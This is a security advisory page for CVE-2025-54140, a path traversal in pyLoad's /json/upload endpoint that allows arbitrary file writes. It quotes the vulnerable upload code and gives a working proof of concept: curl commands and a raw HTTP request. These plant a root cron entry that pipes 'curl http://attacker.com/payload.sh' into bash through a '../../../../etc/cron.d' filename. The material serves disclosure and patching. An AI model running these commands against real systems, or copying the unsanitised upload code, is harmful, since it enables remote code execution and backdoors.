GHSA-XQPG-92FQ-GRFG

Vulnerability from github – Published: 2025-07-21 21:16 – Updated: 2025-07-23 13:37
VLAI?
Summary
`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write
Details

Summary

An authenticated path traversal vulnerability exists in the /json/upload endpoint of the pyLoad By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to:

  • Remote Code Execution (RCE)
  • Local Privilege Escalation
  • System-wide compromise
  • Persistence and backdoors

Vulnerable Code

File: src/pyload/webui/app/blueprints/json_blueprint.py

@json_blueprint.route("/upload", methods=["POST"])
def upload():
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        file_path = os.path.join(dir_path, "tmp_" + file.filename)  
        file.save(file_path)

Issue: No sanitization or validation on file.filename, allowing traversal via ../../ sequences.

(Proof of Concept)

  1. Clone and install pyLoad from source (pip install pyload-ng):
git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload
  1. Or install via pip (PyPi) in virtualenv:
python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload
  1. Login and obtain session token
curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
  -d "username=admin&password=admin"
  1. Create malicious cron payload
echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
  1. Upload file with path traversal filename
curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
  -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
  1. On the next cron tick, a reverse shell or payload will be triggered.

BurpSuite HTTP Request

POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--
Severity ?
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pyload-ng"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.5.0b3.dev89"
            },
            {
              "fixed": "0.5.0b3.dev90"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.5.0b3.dev89"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54140"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-21T21:16:06Z",
    "nvd_published_at": "2025-07-22T22:15:38Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nAn **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of the `pyLoad` By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory, allowing them to **write arbitrary files to any location** on the system accessible to the pyLoad process. This may lead to:\n\n* **Remote Code Execution (RCE)**\n* **Local Privilege Escalation**\n* **System-wide compromise**\n* **Persistence and backdoors**\n\n---\n\n### Vulnerable Code\n\nFile: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109)\n\n```python\n@json_blueprint.route(\"/upload\", methods=[\"POST\"])\ndef upload():\n    dir_path = api.get_config_value(\"general\", \"storage_folder\")\n    for file in request.files.getlist(\"file\"):\n        file_path = os.path.join(dir_path, \"tmp_\" + file.filename)  \n        file.save(file_path) \n```\n**Issue**: No sanitization or validation on `file.filename`, allowing traversal via `../../` sequences.\n\n\n\n\n### (Proof of Concept)\n\n1. **Clone and install pyLoad from source** (`pip install pyload-ng`):\n\n```bash\ngit clone https://github.com/pyload/pyload\ncd pyload\ngit checkout 0.4.20\npython -m pip install -e .\npyload --userdir=/tmp/pyload\n```\n\n2. **Or install via pip (PyPi) in virtualenv:**\n\n```bash\npython -m venv pyload-env\nsource pyload-env/bin/activate\npip install pyload==0.4.20\npyload\n```\n\n\n1. **Login and obtain session token**\n```bash\ncurl -c cookies.txt -X POST http://127.0.0.1:8000/login \\\n  -d \"username=admin\u0026password=admin\"\n```\n\n2. **Create malicious cron payload**\n```bash\necho \"*/1 * * * * root curl http://attacker.com/payload.sh | bash\" \u003e exploit\n```\n\n3. **Upload file with path traversal filename**\n```bash\ncurl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \\\n  -F \"file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor\"\n```\n\n4. On the next cron tick, a reverse shell or payload will be triggered.\n\n### BurpSuite HTTP Request\n\n```\nPOST /json/upload HTTP/1.1\nHost: 127.0.0.1:8000\nCookie: session=SESSION_ID_HERE\nContent-Type: multipart/form-data; boundary=------------------------d74496d66958873e\n\n--------------------------d74496d66958873e\nContent-Disposition: form-data; name=\"file\"; filename=\"../../../../etc/cron.d/pyload_backdoor\"\nContent-Type: application/octet-stream\n\n*/1 * * * * root curl http://attacker.com/payload.sh | bash\n--------------------------d74496d66958873e--\n```",
  "id": "GHSA-xqpg-92fq-grfg",
  "modified": "2025-07-23T13:37:09Z",
  "published": "2025-07-21T21:16:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54140"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyload/pyload"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.